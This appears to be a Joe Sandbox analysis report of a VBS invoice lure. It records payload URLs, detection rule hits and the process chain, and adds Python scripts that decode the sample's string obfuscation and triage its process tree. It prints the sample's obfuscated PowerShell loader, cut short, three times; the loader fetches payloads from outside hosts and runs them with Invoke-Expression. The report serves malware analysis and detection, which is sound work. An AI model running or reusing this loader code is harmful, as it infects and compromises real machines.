Source: global traffic | HTTP traffic detected: GET /wp-includes/img/Appliances.smi HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: adjuntia.ru.com
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /wp-includes/img/Appliances.smi HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: adjuntia.ru.com
    Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: adjuntia.ru.com
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0F9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://adjuntia.ru.com
Source: powershell.exe, 00000003.00000002.3438249100.00000266D77E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000007.00000002.3329236621.0000000007A0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2032932781.0000021ADDAF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033119338.0000021ADDB1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6270429c06a4
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000003.2033161555.0000021ADDAD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6270429c0
Source: powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF5E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266C0C44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://adjuntia.ru.com
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://adjuntia.ru.com/wp-includes/img/Appliances.smi
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ambyverce.com/Appliances.smi
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ambyverce.com/Appliances.smid
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0605000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | HTTPS traffic detected: 185.221.216.115:443 -> 192.168.2.5:49705 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_5572.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: INVOICE_DF76K.vbs | Static file information: Suspicious name
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6705
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6705
              Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey (17 identical entries)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
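The command line above is the sample's first PowerShell stage. Every string it passes to `konstruktive` is padded: the real character is the fifth of each 5-character group, and `konstruktive` walks the string with `Substring($i, 1)` for `$i = 4, 9, 14, ...` while `$i` is below `Length - 1` (`$Semiprofanity26++` on an unset variable yields 1, and `'SUBsTR' + 'ing'` is just `Substring`, since PowerShell method names are case-insensitive). The following decoder is an added example for this report, not code from Joe Sandbox or from the sample; it ports that loop to Python and applies it to three short literals copied from the command line. Only short literals are used because the HTML extraction collapses repeated spaces, which corrupts the longer ones.

```python
"""Decoder for the string obfuscation in the PowerShell stage quoted above.

Added example; not part of the Joe Sandbox report and not the sample's own code.
It ports the sample's `konstruktive` function:
  $Semiprofanity26++   on an unset variable yields 1, so every Substring is 1 char
  $Afrikaans           is 'SUBsTR' + 'ing', i.e. the Substring method
  For($i=4; $i -lt Length-1; $i+=5) { $out += $s.Substring($i, 1) }
so the real character is the last of every 5-character group, and the character
of the final group is dropped by the Length-1 bound.
"""
import re

GROUP = 5      # one real character per 5-character group
OFFSET = 4     # sitting at the last position of the group


def konstruktive(s: str) -> str:
    """Port of the sample's decoder: characters at indices 4, 9, 14, ... < len(s) - 1."""
    return "".join(s[i] for i in range(OFFSET, len(s) - 1, GROUP))


def encode_like_sample(plain: str, junk: str = "abcd") -> str:
    """Inverse, for testing: 4 junk characters before every real one, plus one
    trailing junk character so the last real character still satisfies i < len-1."""
    return "".join(junk + c for c in plain) + " "


# Literals copied verbatim from the command line in the report (short ones only:
# HTML extraction collapses repeated spaces, which corrupts the longer literals).
SAMPLE_LITERALS = {
    "$Begazes":       "Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ",
    "$Toddyskes":     "A,um> Tra ",
    "$Ecumenicalism": "e asiK.lleDomix ilr ",
}

# Every `konstruktive '...'` literal in a captured command line, in order.
LITERAL_RE = re.compile(r"konstruktive '([^']*)'")


def decode_command_line(cmd: str) -> list[str]:
    """Decode all konstruktive literals found in a PowerShell command line."""
    return [konstruktive(lit) for lit in LITERAL_RE.findall(cmd)]


if __name__ == "__main__":
    for name, lit in SAMPLE_LITERALS.items():
        print(f"{name} = {konstruktive(lit)!r}")
```

Running it recovers `iex` for `$Ecumenicalism`, so `Kreditorselskabs` is a dot-sourced `Invoke-Expression` of each decoded fragment; `>` for `$Toddyskes`, the separator the script later splits its URL list on; and `User-Agent` for `$Begazes`, which matches the "known web browser user agent" signature in the report. Run `decode_command_line` over the full 6705-character command line from a fresh capture (not the whitespace-collapsed copy above) to recover the remaining fragments.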
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF848D7B116
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF848D7BE92
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF848E43244
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04D0EF70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04D0F840
              Source: INVOICE_DF76K.vbs | Initial sample: Strings found which are bigger than 50
              Source: amsi32_5572.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@11/8@1/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Spisefisk.Pur
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqo2ziok.hts.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5572
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
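The process-creation entries above give the full execution chain: wscript.exe running the lure launches 64-bit powershell.exe with a 6705-character obfuscated command line; that PowerShell resolves `%appdata%` by spawning `cmd.exe /c echo ...`, then respawns itself from SysWOW64 (32-bit) with the same command line, which again spawns cmd.exe. The triage script below is an added example for this report, not Joe Sandbox code: it replays that chain over constructed process-creation events and flags the relationships the report's signatures name (script host spawning PowerShell, very long and obfuscated command lines, 64-bit to 32-bit PowerShell respawn, cmd.exe used to echo an `%appdata%` path). PIDs 1600 and 5572 are the PowerShell PIDs named in the report; the other PIDs, the 4096-character threshold, the `'Invoke'` plus long-literal heuristic and the rule names are assumptions of this example.

```python
"""Process-tree triage mirroring the execution chain listed above.

Added example, not Joe Sandbox code. The events are constructed to reproduce the
report's chain: wscript.exe -> 64-bit powershell.exe (very long command line) ->
cmd.exe, and 64-bit powershell.exe -> SysWOW64 powershell.exe -> cmd.exe. PIDs
1600 and 5572 are the two PowerShell PIDs named in the report; the other PIDs,
the threshold below, the obfuscation heuristic and the rule names are assumptions.
"""

LONG_CMDLINE = 4096            # assumed threshold; the report flags a 6705-char line
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Stand-in for the sample's first stage: the decoder function quoted in the
# report, followed by one oversized obfuscated literal (the real line is ~6.7 KB).
STAGE1_PREFIX = (
    "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}"
    "$Afrikaans+='ing';Function konstruktive($Metaludlser){"
    "$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;"
    "For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){"
    "$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}"
)
OBF_CMDLINE = STAGE1_PREFIX + "$Begazes=konstruktive '" + "Pr.sU" * 1300 + "';"
CMD_ECHO = r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"'

SAMPLE_EVENTS = [  # constructed process-creation events (pid, ppid, image, cmdline)
    {"pid": 100,  "ppid": 1,    "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs"'},
    {"pid": 1600, "ppid": 100,  "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": OBF_CMDLINE},
    {"pid": 200,  "ppid": 1600, "image": r"C:\Windows\System32\cmd.exe", "cmdline": CMD_ECHO},
    {"pid": 5572, "ppid": 1600, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": OBF_CMDLINE},
    {"pid": 300,  "ppid": 5572, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": CMD_ECHO},
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_wow64(path: str) -> bool:
    """True for the 32-bit copies of system binaries under SysWOW64."""
    return "\\syswow64\\" in path.lower()


def looks_obfuscated(cmd: str) -> bool:
    """Heuristic taken from this sample: a method called through a string
    ('Invoke') together with a single-quoted literal of 100+ characters."""
    in_quote, run, longest = False, 0, 0
    for ch in cmd:
        if ch == "'":
            in_quote, run = not in_quote, 0
        elif in_quote:
            run += 1
            longest = max(longest, run)
    return "'Invoke'" in cmd and longest >= 100


def triage(events: list[dict]) -> list[tuple[int, str]]:
    """Return (pid, rule) findings; the rules follow the report's signatures."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""
        img = image_name(e["image"])
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS:
            findings.append((e["pid"], "script_host_spawns_powershell"))
        if len(e["cmdline"]) > LONG_CMDLINE:
            findings.append((e["pid"], "very_long_command_line"))
        if img == "powershell.exe" and looks_obfuscated(e["cmdline"]):
            findings.append((e["pid"], "obfuscated_powershell"))
        if (img == "powershell.exe" and pimg == "powershell.exe"
                and is_wow64(e["image"]) and not is_wow64(parent["image"])):
            findings.append((e["pid"], "powershell_64bit_spawns_32bit"))
        if img == "cmd.exe" and pimg == "powershell.exe" and "%appdata%" in e["cmdline"].lower():
            findings.append((e["pid"], "cmd_echo_resolves_appdata_path"))
    return findings


if __name__ == "__main__":
    for pid, rule in triage(SAMPLE_EVENTS):
        print(pid, rule)
```

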